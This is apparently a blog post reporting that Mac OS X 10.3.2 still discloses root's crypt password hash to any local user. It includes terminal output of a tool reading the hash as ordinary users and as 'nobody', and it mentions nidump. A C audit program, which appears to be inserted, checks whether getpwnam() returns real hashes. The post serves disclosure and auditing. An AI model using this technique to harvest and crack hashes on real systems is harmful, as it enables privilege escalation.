As I reported back in September, MacOS X would blindly give any user access to any other user’s crypt’d password hash.
This made it quite trivial for any user to run one of the many ‘crack’ programs in a brute-force attempt to obtain access as other users. For obvious reasons this is bad, as MacOS X is quite capable of acting as a server!
I decided on a whim to test my ‘passentry’ (code available within the article linked above, or here) against 10.3.2. Guess what? It doesn’t work for ‘normal’ users anymore, but DOES still work to obtain the password hash for ‘root’, as ANY user!
6:24 [macoontosh] /Users/shawn/Documents/code/misc/passentry%make
cc passentry.c -o passentry
6:24 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo ./passentry shawn
DEBUG: I’m running UID 501, EUID 501. // Just me!
I can read user shawn’s password hash, it’s ’********’.
6:24 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo ./passentry root
DEBUG: I’m running UID 0, EUID 0. // So, I’m root. This is fine
I can read user root’s password hash, it’s ‘REMOVED’.
6:25 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo -u shawn ./passentry root
DEBUG: I’m running UID 501, EUID 501. // Me again.
I can read user root’s password hash, it’s ‘REMOVED’.
6:25 [macoontosh] /Users/shawn/Documents/code/misc/passentry%sudo -u nobody ./passentry root
DEBUG: I’m running UID -2, EUID -2. // nobody
I can read user root’s password hash, it’s ‘REMOVED’.

You can see that when I attempted to obtain my personal password hash, it did not work: it returned a bogus string, even when executing as root. Oddly, the converse holds: running as any user (myself), I am able to obtain root’s.
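The check run by hand above can be turned into a small audit that any admin can run as an unprivileged user after an update. This is an added example, not the passentry code from the post; it uses only getpwnam(3) and classifies the returned pw_passwd field as a real crypt(3) hash or a placeholder, so a "HASH DISCLOSED" line for an account means that account's hash is exposed to offline cracking.

```c
/* Added example (not the post's passentry.c): report which accounts hand an
 * unprivileged caller a usable crypt(3) hash via getpwnam() instead of a
 * placeholder such as "********". Run as an ordinary user. */
#include <ctype.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Returns 1 if pw looks like real crypt(3) output: the classic 13-character
 * DES form (2-char salt + 11 chars from [A-Za-z0-9./]) or the modular
 * "$id$salt$hash" form. Placeholders ("*", "x", "!", "", "********")
 * return 0. */
int looks_like_crypt_hash(const char *pw)
{
    if (pw == NULL)
        return 0;
    size_t n = strlen(pw);
    if (pw[0] == '$')                      /* $1$, $2a$, $6$ ... */
        return n > 3 && strchr(pw + 1, '$') != NULL;
    if (n != 13)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)pw[i]) && pw[i] != '.' && pw[i] != '/')
            return 0;
    return 1;
}

/* Looks up one account and reports whether its hash field is visible to the
 * calling UID. Returns 1 if a hash is disclosed, 0 if hidden, -1 if no such
 * user exists. */
int check_user(const char *name)
{
    struct passwd *pw = getpwnam(name);
    if (pw == NULL)
        return -1;
    int leaked = looks_like_crypt_hash(pw->pw_passwd);
    printf("uid=%d euid=%d target=%s: %s\n", (int)getuid(), (int)geteuid(),
           name, leaked ? "HASH DISCLOSED" : "placeholder only");
    return leaked;
}

/* Usage: ./hashaudit root shawn nobody  (exit status 1 if any hash leaked) */
int main(int argc, char **argv)
{
    int leaked_any = 0;
    for (int i = 1; i < argc; i++)
        if (check_user(argv[i]) == 1)
            leaked_any = 1;
    return leaked_any;
}
```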
I’m glad that they fixed part of this oversight; but I’m a bit annoyed that this still works for root, and the implication, of course, is that any user can still run ‘nidump’.